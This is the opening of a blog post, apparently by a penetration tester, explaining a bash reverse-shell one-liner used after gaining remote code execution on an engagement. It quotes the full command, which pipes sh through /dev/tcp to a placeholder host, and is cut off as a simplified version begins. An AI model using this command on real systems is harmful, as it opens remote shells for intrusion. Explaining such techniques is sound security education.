Showing posts from April, 2020

"A Gnarly Looking Shell Command" Explained!

Here is a one-liner I recently used on an op that a teammate called a "gnarly looking shell command." And he was right. This is gnarly looking:

sh -c $@ | sh . echo 0<&196;exec 196<>/dev/tcp/X.X.X.X/NNN; sh <&196 >&196 2>&196

My team lead came up with it for me about a year ago on a gig where we had RCE but the easier shelling methods were failing. I saved it in my notes and pulled it out the other day because we had RCE on a similar target.
Anyway, seeing a command like that warrants pause and consideration unless you are fluent in command line interpreter lexical structures, and though I know enough to be dangerous, I wanted to better understand the magic of what was happening at a more technical level. So, I thought I would write this all down and share it with everyone.
While writing this blog post, I found some ways to clean it up a bit and make it easier to understand. Let's cover this version of it instead:
exec 196<>/…